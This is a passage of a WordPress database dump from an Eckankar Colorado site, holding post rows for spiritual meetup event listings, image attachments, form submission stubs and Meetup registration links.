and explore our own unique relationship with the Divine.</span></p>\r\n<p>[ninja_form id=46]</p>','ONLINE - ECK Light and Sound Service<br>\'Your Next Step Spiritually\'','','publish','closed','closed','','online-eck-light-and-sound-serviceyour-next-step-spiritually','','','2022-01-31 13:58:49','2022-01-31 20:58:49','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266169',0,'mec-events','',0),(266173,2,'2022-01-15 12:06:12','2022-01-15 19:06:12','','John','','inherit','closed','closed','','john','','','2022-01-15 12:06:12','2022-01-15 19:06:12','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/01/John.webp',0,'attachment','image/webp',0),(266175,0,'2022-01-16 15:40:43','2022-01-16 22:40:43','','','','publish','closed','closed','','266175','','','2022-01-16 15:40:43','2022-01-16 22:40:43','',0,'https://eckankar-colorado.org/nf_sub/266175/',0,'nf_sub','',0),(266177,15,'2022-01-18 07:06:20','2022-01-18 14:06:20','<div class=\"emrv9za\">\r\n<div class=\"px-6 sm:px-4 xl:px-0 md:max-w-screen w-full mt-5\">\r\n<div class=\"flex justify-between\">\r\n<p><span style=\"font-size: 18pt;\"><strong><span style=\"color: #333333; font-family: \'Open Sans\', Helvetica, Arial, sans-serif;\">Spiritual freedom means to be freed from whatever is causing us problems. You came into this life to spread your wings and live in freedom – heart, mind, and soul!</span></strong></span></p>\r\n</div>\r\n<p class=\"break-words\"><span style=\"font-size: 14pt;\">Are you ready to accept the freedom of a new state of consciousness? And a renewed sense of joy and love for life?</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Open your wings and prepare for flight!</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Come to share your thoughts, experiences, and questions about \'Spiritual Freedom\' in this open discussion; explore with others who have similar spiritual interests.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">“The ultimate state of spiritual freedom brings wisdom, love, and spiritual power. But there are stages in between. We expand or unfold from no freedom into a greater state of spiritual freedom.” Harold Klemp - <em>ECK WISDOM on Spiritual Freedom</em> - pg. 6.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Event Presented by <a class=\"link\" title=\"https://www.eckankar-colorado.org\" href=\"https://www.eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\">ECKANKAR</a></span></p>\r\n</div>\r\n</div>\r\n<div class=\"px-6 sm:px-4 xl:px-0 md:max-w-screen w-full mt-5\">\r\n<div class=\"flex justify-between\"></div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><strong>COVID-19 Safety Measures</strong></div>\r\n<div class=\"\">\r\n<div><strong>**</strong><em>Per Jefferson County requirements, face masks are required in all public indoor spaces for anyone over the age of 3 with the exception of individuals leading a religious service as long as they maintain a twelve-foot distance. At our in-person events, Colorado Satsang Society will require face masks to be worn. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"px-6 sm:px-4 xl:px-0 md:max-w-screen w-full mt-5\">\r\n<div class=\"bg-white rounded-lg\">\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/283241916/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>','Pagosa Springs - IN PERSON Meetup<br>Spiritual Freedom','','publish','closed','closed','','in-person-meetup-pagosa-springsspiritual-freedom','','','2022-01-18 10:01:59','2022-01-18 17:01:59','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266177',0,'mec-events','',0),(266179,15,'2022-01-18 07:18:14','2022-01-18 14:18:14','','SpiritualFreedom','','inherit','closed','closed','','pagosaevent','','','2022-01-23 09:27:48','2022-01-23 16:27:48','',266177,'https://eckankar-colorado.org/wp-content/uploads/2022/01/PagosaEvent.webp',0,'attachment','image/webp',0),(266182,0,'2022-01-20 17:45:07','2022-01-21 00:45:07','','','','publish','closed','closed','','266182','','','2022-01-20 17:45:07','2022-01-21 00:45:07','',0,'https://eckankar-colorado.org/nf_sub/266182/',0,'nf_sub','',0),(266183,0,'2022-01-20 18:26:17','2022-01-21 01:26:17','','','','publish','closed','closed','','266183','','','2022-01-20 18:26:17','2022-01-21 01:26:17','',0,'https://eckankar-colorado.org/nf_sub/266183/',0,'nf_sub','',0),(266185,2,'2022-01-22 17:28:40','2022-01-23 00:28:40','<p><strong><span style=\"font-size: 16pt;\">• Do you have techniques that you use to remember how sacred you are?</span></strong><br />\r\n<br />\r\n<strong><span style=\"font-size: 16pt;\">• Do you have a personal experience to share about how Divine Spirit changed your life?</span></strong><br />\r\n<br />\r\n<strong><span style=\"font-size: 16pt;\">• What do you do that helps bring a Spiritual Awareness to the moment?</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Let’s explore the gifts of Creating Sacred Space Within. You are invited to this open discussion to share your insights and stories about Creating Sacred Space Within. We will also try a technique or two to help you connect to the Divine.<br />\r\n<br />\r\n</span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666;\">“There is no separation between the physical life — your everyday life — and your spiritual life.”</span><br />\r\n<span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em>The Secret of Love</em>, p. 86</span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 14pt;\">Creative techniques using visualization, contemplation, and sacred words can offer you a doorway to a more conscious experience with Divine Spirit within, which can be exhilarating, subtle, profound, and life changing.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"http://www.TheSoundofSoul.org\" target=\"_blank\" rel=\"noopener\">The Sound of Soul</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/283430767/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>\'Creating Sacred Space Within\'','','publish','closed','closed','','online-meetupcreating-sacred-space-within','','','2022-01-22 17:32:00','2022-01-23 00:32:00','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266185',0,'mec-events','',0),(266186,2,'2022-01-22 17:27:31','2022-01-23 00:27:31','','girl-with-flower-1','','inherit','closed','closed','','girl-with-flower-1','','','2022-01-22 17:27:31','2022-01-23 00:27:31','',266185,'https://eckankar-colorado.org/wp-content/uploads/2022/01/girl-with-flower-1.jpg',0,'attachment','image/jpeg',0),(266188,2,'2022-01-22 17:38:25','2022-01-23 00:38:25','<p><strong><span style=\"font-size: 16pt;\">• Would you like to improve your relationships with your family, friends, or co-workers?</span></strong><br />\r\n<strong><span style=\"font-size: 16pt;\">• If you love and respect yourself, can you more easily love and respect others?</span></strong><br />\r\n<strong><span style=\"font-size: 16pt;\">• What are ways that you can give yourself more divine love?</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You are invited to join our discussion as we explore ways to help us love ourselves more as Soul and how this affects our family and others we interact with. You will have the opportunity to practice a simple spiritual technique to give yourself more love.<br />\r\n<br />\r\n</span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666;\">“Loving yourself doesn\'t mean to have a high, egotistical regard for yourself or go strutting around like some dictator. It means to have respect for yourself as Soul, as a child of God... The next important step is to know and recognize that other people are also Soul, lights of God.”</span><br />\r\n<span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em>The Slow Burning Love of God,</em> p. 163<em><br />\r\n</em></span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">The Sound of Soul</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/283430858/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>\'Helping Others by Loving Yourself\'','','publish','closed','closed','','online-meetuphelping-others-by-loving-yourself','','','2022-01-22 17:44:06','2022-01-23 00:44:06','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266188',0,'mec-events','',0),(266189,2,'2022-01-22 17:37:52','2022-01-23 00:37:52','','woman-in-light-1','','inherit','closed','closed','','woman-in-light-1','','','2022-01-22 17:37:52','2022-01-23 00:37:52','',266188,'https://eckankar-colorado.org/wp-content/uploads/2022/01/woman-in-light-1.jpg',0,'attachment','image/jpeg',0),(266191,2,'2022-01-22 17:49:35','2022-01-23 00:49:35','<p><strong><span style=\"font-size: 16pt;\">• How do you recognize the voice of your own Inner Guidance?</span></strong><br />\r\n<strong><span style=\"font-size: 16pt;\">• What are some of the tools you use to navigate daily challenges?</span></strong><br />\r\n<strong><span style=\"font-size: 16pt;\">• Once you’ve chosen your next step, how do you act on it?</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You are welcome to join us and discover what others have learned as they face the ongoing challenges of life. We will share tools that can help you hear your own Inner Guidance, and ways to access it daily, in every moment.<br />\r\n<br />\r\n</span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666;\">“Often people are afraid to follow their inner guidance. It sounds like such a foolish thing to do, especially if they have to face other people and explain why they are doing what they are doing. One of the very strong pressures in life is the social consciousness: What will people think? What will people say?”</span><br />\r\n<span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em>ECK Wisdom on Inner Guidance</em>, p. 5<em><br />\r\n</em></span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">The Sound of Soul</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/283430880/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>\'Following Your Inner Guidance\'','','publish','closed','closed','','online-meetupfollowing-your-inner-guidance','','','2022-01-22 17:51:27','2022-01-23 00:51:27','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266191',0,'mec-events','',0),(266194,15,'2022-01-23 09:34:31','2022-01-23 16:34:31','<p><span style=\"font-size: 14pt;\"><strong>Spiritual freedom means to be freed from whatever is causing us problems. You came into this life to spread your wings and live in freedom – heart, mind, and soul!</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Are you ready to accept the freedom of a new state of consciousness? And a renewed sense of joy and love for life?</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Open your wings and prepare for flight!</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Come to share your thoughts, experiences, and questions about \'Spiritual Freedom\' in this open discussion; explore with others who have similar spiritual interests.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">“The ultimate state of spiritual freedom brings wisdom, love, and spiritual power. But there are stages in between. We expand or unfold from no freedom into a greater state of spiritual freedom.” Harold Klemp - <em>ECK WISDOM on Spiritual Freedom</em> - pg. 6</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">This is the second of three free online explorations of ‘Spiritual Freedom’. Each monthly meetup in this series will be its own discussion on some facets of ‘Spiritual Freedom’; you may enjoy, and are welcome to attend, any one or any combination of the three sessions.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\"><em>ECK WISDOM on Spiritual Freedom</em>, is a booklet which is a ticket to an unexpected destination – the heart of your being. It is available for purchase <a href=\"https://www.eckbooks.org/items/-2075-3.html?\" target=\"_blank\" rel=\"noopener\">HERE</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Event Presented by <a href=\"https://www.eckankar-colorado.org\">ECKANKAR</a></span></p>\r\n<p><br />\r\n<a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/283427537/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - Spiritual Freedom','','publish','closed','closed','','online-meetup-spiritual-freedom','','','2022-01-23 15:06:34','2022-01-23 22:06:34','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266194',0,'mec-events','',0),(266195,15,'2022-01-23 12:54:03','2022-01-23 19:54:03','<p><span style=\"font-size: 14pt;\"><strong>Spiritual freedom means to be freed from whatever is causing us problems. You came into this life to spread your wings and live in freedom – heart, mind, and soul!</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Are you ready to accept the freedom of a new state of consciousness? And a renewed sense of joy and love for life?</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Open your wings and prepare for flight!</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Come to share your thoughts, experiences, and questions about \'Spiritual Freedom\' in this open discussion; explore with others who have similar spiritual interests.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">“The ultimate state of spiritual freedom brings wisdom, love, and spiritual power. But there are stages in between. We expand or unfold from no freedom into a greater state of spiritual freedom.” Harold Klemp - <em>ECK WISDOM on Spiritual Freedom</em> - pg. 6</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">This is the third of three free online explorations of ‘Spiritual Freedom’. Each monthly meetup in this series will be its own discussion on some facets of ‘Spiritual Freedom’; you may enjoy, and are welcome to attend, any one or any combination of the three sessions.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\"><em>ECK WISDOM on Spiritual Freedom</em>, is a booklet which is a ticket to an unexpected destination – the heart of your being. It is available for purchase <a href=\"https://www.eckbooks.org/items/-2075-3.html?\" target=\"_blank\" rel=\"noopener\">HERE</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Event Presented by <a href=\"https://www.eckankar-colorado.org\">ECKANKAR</a><br />\r\n</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/283427565/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - Spiritual Freedom','','publish','closed','closed','','online-meetup-spiritual-freedom-686','','','2022-01-23 15:01:51','2022-01-23 22:01:51','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266195',0,'mec-events','',0),(266196,15,'2022-01-23 13:18:49','2022-01-23 20:18:49','<p><span style=\"font-size: 14pt;\"><strong>Are you looking for something you can do to change your life and discover more happiness?</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>Do you wonder how love can help you to stay balanced when challenges appear?</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>Would you like to talk with others who have discovered a secret key to deal with problems?</strong></span></p>\r\n<blockquote>\r\n<p><span style=\"font-size: 14pt;\">“People who give to others find that they have better health and enjoy a happier life than those who have yet to learn the blessings of giving of themselves.”</span><br />\r\n<span style=\"font-size: 14pt;\">“So do a little deed of some kind for others, and you will begin to see a change in your life. You will find that life gives you more and more. You will become a happier, more fulfilled human being.”</span><br />\r\n<span style=\"font-size: 14pt;\">Quotes by Harold Klemp from the <em>Soul Adventure Magazine</em> referenced below.</span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 14pt;\">Today’s fast paced world seems to bring a multitude of problems quickly and consistently to our attention. Is it possible to shift focus and see the opportunity for spiritual growth rather than the problem in a challenging situation?</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Here is one spiritual exercise that many have used to make the shift. Do one small thing for another living creature. It does not have to be a big life changing event, but it has to be done for love with no expectation of return or recognition. Try it yourself and discover how your life can change.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Another helpful spiritual exercise is to chant HU, a love song to God. It is one of the easiest of the Spiritual Exercises of ECK. There will be an opportunity to sing HU during this discussion.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Join others who are working with these and other spiritual exercise of ECK to awaken their own divine creativity and move through life’s challenges with more grace and happiness. Share your experiences, listen to others and ask questions during this online event.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs. Visit  <a href=\"https://www.eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\">ECKANKAR in Colorado</a> to learn more.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You are welcome to read more miraculous true-life stories related to this topic in the free ECKANKAR <a href=\"https://www.eckankar.org/1-issue/\" target=\"_blank\" rel=\"noopener\"><em>Soul Adventure Magazine</em></a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\"><br />\r\n<a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/283427977/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></span></p>','Online Meetup - <br>Surprise Your Heart! Do One Small Thing for Love','','publish','closed','closed','','online-meetup-surprise-your-heart-do-one-small-thing-for-love','','','2022-01-23 18:10:02','2022-01-24 01:10:02','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266196',0,'mec-events','',0),(266197,15,'2022-01-23 13:11:07','2022-01-23 20:11:07','','SupriseHeart','','inherit','closed','closed','','supriseheart','','','2022-01-23 13:11:07','2022-01-23 20:11:07','',266196,'https://eckankar-colorado.org/wp-content/uploads/2022/01/SupriseHeart.webp',0,'attachment','image/webp',0),(266198,15,'2022-01-23 13:23:35','2022-01-23 20:23:35','<p><span style=\"font-size: 14pt;\"><strong>Are you looking for something you can do to change your life and discover more happiness?</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>Do you wonder how love can help you to stay balanced when challenges appear?</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>Would you like to talk with others who have discovered a secret key to deal with problems?</strong></span></p>\r\n<blockquote>\r\n<p><span style=\"font-size: 14pt;\">“People who give to others find that they have better health and enjoy a happier life than those who have yet to learn the blessings of giving of themselves.”</span><br />\r\n<span style=\"font-size: 14pt;\">“So do a little deed of some kind for others, and you will begin to see a change in your life. You will find that life gives you more and more. You will become a happier, more fulfilled human being.”</span><br />\r\n<span style=\"font-size: 14pt;\">Quotes by Harold Klemp from the <em>Soul Adventure Magazine</em> referenced below.</span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 14pt;\">Today’s fast paced world seems to bring a multitude of problems quickly and consistently to our attention. Is it possible to shift focus and see the opportunity for spiritual growth rather than the problem in a challenging situation?</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Here is one spiritual exercise that many have used to make the shift. Do one small thing for another living creature. It does not have to be a big life changing event, but it has to be done for love with no expectation of return or recognition. Try it yourself and discover how your life can change.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Another helpful spiritual exercise is to chant HU, a love song to God. It is one of the easiest of the Spiritual Exercises of ECK. There will be an opportunity to sing HU during this discussion.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Join others who are working with these and other spiritual exercise of ECK to awaken their own divine creativity and move through life’s challenges with more grace and happiness. Share your experiences, listen to others and ask questions during this online event.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs. Visit <a href=\"https://www.eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\">ECKANKAR in Colorado</a> to learn more.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You are welcome to read more miraculous true-life stories related to this topic in the free ECKANKAR <a href=\"https://www.eckankar.org/1-issue/\" target=\"_blank\" rel=\"noopener\"><em>Soul Adventure Magazine</em></a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\"><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/283427984/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></span></p>','Online Meetup - <br>Surprise Your Heart! Do One Small Thing for Love','','publish','closed','closed','','online-meetup-surprise-your-heart-do-one-small-thing-for-love-434','','','2022-01-23 18:08:56','2022-01-24 01:08:56','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266198',0,'mec-events','',0),(266201,15,'2022-01-23 13:41:59','2022-01-23 20:41:59','<div class=\"emrv9za\">\r\n<div class=\"px-6 sm:px-4 xl:px-0 md:max-w-screen w-full mt-5\">\r\n<div class=\"break-words\"><span style=\"font-size: 14pt;\"><strong>You\'re invited to experience chanting HU, a love song to God, contemplative time, and spiritual conversation with others of like heart.</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">A divine sound courses through all life - through every blade of grass, every galaxy, every atom of our bodies. HU is an ancient, sacred name for God - a carrier of love between Soul and God. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. It is the clear Voice of God, with the power to transform the lead of the human consciousness into the gold of an enlightened Soul.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Find your own proof of the love and power of HU.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by Eckankar, the Path of Spiritual Freedom as a community service.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">For more information about HU, check out <a href=\"http://www.TheSoundofSoul.org\">The Sound of Soul</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></div>\r\n</div>\r\n</div>\r\n<div class=\"px-6 sm:px-4 xl:px-0 md:max-w-screen w-full mt-5\">\r\n<div class=\"flex justify-between\"></div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"text-xl text-black font-semibold\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br />\r\n**</strong> <em>Per Jefferson County requirements, face masks are required in all public indoor spaces for anyone over the age of 3 with the exception of individuals leading a religious service as long as they maintain a twelve-foot distance. At our in-person events, Colorado Satsang Society will require face masks to be worn. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<p>&nbsp;</p>','IN PERSON - <br>Experience HU, The Sound of Soul','','publish','closed','closed','','in-person-experience-hu-the-sound-of-soul-3','','','2022-01-23 13:43:08','2022-01-23 20:43:08','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266201',0,'mec-events','',0),(266202,15,'2022-01-23 13:33:04','2022-01-23 20:33:04','','ExperienceHu','','inherit','closed','closed','','experiencehu','','','2022-01-23 13:33:04','2022-01-23 20:33:04','',266201,'https://eckankar-colorado.org/wp-content/uploads/2022/01/ExperienceHu.webp',0,'attachment','image/webp',0),(266206,2,'2022-01-23 20:16:59','2022-01-24 03:16:59','<p><strong><span style=\"font-size: 16pt;\">Do you have natural talents and wonder where they came from?<br />\r\n</span></strong><strong><span style=\"font-size: 16pt;\">Do you have strong likes, dislikes, or unexplained fears?<br />\r\n</span></strong><strong><span style=\"font-size: 16pt;\">Are you especially attracted to certain countries or periods of history?</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">If you are ready to explore your past and see what lessons it holds for you today, then this discussion is for you.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Harold Klemp says in his book <em>Karma and Reincarnation</em>, “<strong>You are Soul, an immortal being created in the timeless worlds. You existed before birth and endure beyond time and space. God made Soul before the worlds of time and space began. Soul comes to earth from the higher spiritual worlds to add to its experiences. It inherits many lifetimes for the chance to learn. </strong></span><span style=\"font-size: 14pt;\"><strong>And learn it must.</strong>”</span></p>\r\n<p><span style=\"font-size: 14pt;\">We have all lived before. Your past lives helped you get where you are today. Your job, your family, your virtues, and your shortcomings all have roots in distant landscapes. Unlocking memories and lessons can help you sort through problems and move ahead with confidence.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Please join us for this in-person discussion. People of faiths and beliefs are welcome.<br />\r\n<br />\r\n</span></p>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><strong>COVID-19 Safety Measures</strong></div>\r\n<div class=\"\">\r\n<div><strong>** </strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></div>\r\n</div>\r\n</div>\r\n</div>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/283362377/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Pagosa Springs- IN PERSON Meetup<br>\'Past Lives, Present Lessons\'','','publish','closed','closed','','pagosa-springs-in-person-meetuppast-lives-present-lessons','','','2022-01-23 20:25:54','2022-01-24 03:25:54','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266206',0,'mec-events','',0),(266207,2,'2022-01-23 20:16:08','2022-01-24 03:16:08','','pyramid-1','','inherit','closed','closed','','pyramid-1','','','2022-01-23 20:16:08','2022-01-24 03:16:08','',266206,'https://eckankar-colorado.org/wp-content/uploads/2022/01/pyramid-1.jpg',0,'attachment','image/jpeg',0),(266209,2,'2022-01-23 20:36:26','2022-01-24 03:36:26','<p><span style=\"font-size: 20pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul>\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><span style=\"font-size: 12pt;\"><strong><span id=\"page3R_mcid16\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\"><br />\r\nOPEN TO PEOPLE OF ALL BELIEFS AND FAITHS</span></span></strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong><br />\r\nCOVID-19 Safety Measures<br />\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></p>','Pagosa Springs-IN PERSON<br>\'Experience HU, The Sound of Soul\'','','publish','closed','closed','','pagosa-springs-in-personexperience-hu-the-sound-of-soul','','','2022-01-23 20:39:31','2022-01-24 03:39:31','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266209',0,'mec-events','',0),(266211,2,'2022-01-23 20:41:34','2022-01-24 03:41:34','<p><span style=\"font-size: 20pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul>\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><span style=\"font-size: 12pt;\"><strong><span id=\"page3R_mcid16\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\"><br />\r\nOPEN TO PEOPLE OF ALL BELIEFS AND FAITHS</span></span></strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong><br />\r\nCOVID-19 Safety Measures<br />\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></p>','Pagosa Springs-IN 